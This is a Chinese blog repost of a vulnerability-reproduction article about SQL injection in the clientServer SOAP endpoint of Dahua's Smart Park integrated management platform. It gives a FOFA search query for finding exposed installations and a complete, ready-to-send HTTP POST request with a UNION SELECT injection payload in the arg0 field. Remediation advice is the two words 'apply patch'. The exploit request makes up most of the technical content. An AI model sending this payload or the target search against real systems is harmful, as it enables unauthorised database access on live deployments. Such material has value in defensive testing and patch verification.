大华智慧园区综合管理平台clientServer存在SQL注入漏洞附POC软件

admin

102360
文章

87
评论

2024年3月20日01:18:10评论38 views字数 1051阅读3分30秒阅读模式

1. 大华智慧园区综合管理平台简介

微信公众号搜索：南风漏洞复现文库该文章南风漏洞复现文库公众号首发

大华智慧园区综合管理平台

2.漏洞描述

大华智慧园区综合管理平台是一款综合管理平台，具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配，满足多元化的管理需求，同时通过提供智能服务，增强使用体验。

CVE编号:

CNNVD编号:

CNVD编号:

3.影响版本

大华智慧园区综合管理平台

4.fofa查询语句

app="dahua-智慧园区综合管理平台"

5.漏洞复现

漏洞链接：https://127.0.0.1/portal/services/clientServer

漏洞数据包：

POST /portal/services/clientServer HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Type: text/xml;charset=UTF-8
Content-Length: 421

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cli="http://clientServer.webservice.dssc.dahua.com">
  <soapenv:Header/>
  <soapenv:Body>
  <cli:getGroupInfoListByGroupId>
    <!--type: string-->
      <arg0>-5398) UNION ALL SELECT 5336,5336,5336,5336,user()-- -</arg0>
    <!--type: long-->
    <arg1>10</arg1>
    </cli:getGroupInfoListByGroupId>
    </soapenv:Body>
  </soap:Envelope>

执行user()函数

执行md5(1)

7.整改意见

打补丁

原文始发于微信公众号（南风漏洞复现文库）：大华智慧园区综合管理平台clientServer存在SQL注入漏洞附POC软件

左青龙
微信扫一扫

右白虎
微信扫一扫

大华智慧园区综合管理平台clientServer存在SQL注入漏洞附POC软件

1. 大华智慧园区综合管理平台简介

2.漏洞描述

3.影响版本

4.fofa查询语句

5.漏洞复现

7.整改意见

CVE-2024-2389 命令执行漏洞(附EXP)

CVE-2024-4040 CrushFTP 中的身份验证绕过和任意文件读取

利用 PUT 方法导致三星远程代码执行 (RCE)

泛微E-Mobile 6.0 client.do 命令执行漏洞

【在野0day】某友CRM系统某接口存在任意文件下载（大量资产存在）

【漏洞复现】短视频矩阵营销系统 ajax_uplaod接口处存在任意文件上传

漏洞速递 | Microsoft微软最新RCE漏洞（附EXP）

通达OA down 未授权员工信息泄露漏洞

漏洞预警 | FFmpeg释放后使用漏洞

漏洞预警 | Telegram Windows客户端可执行文件限制不当漏洞

发表评论

在线咨询

微信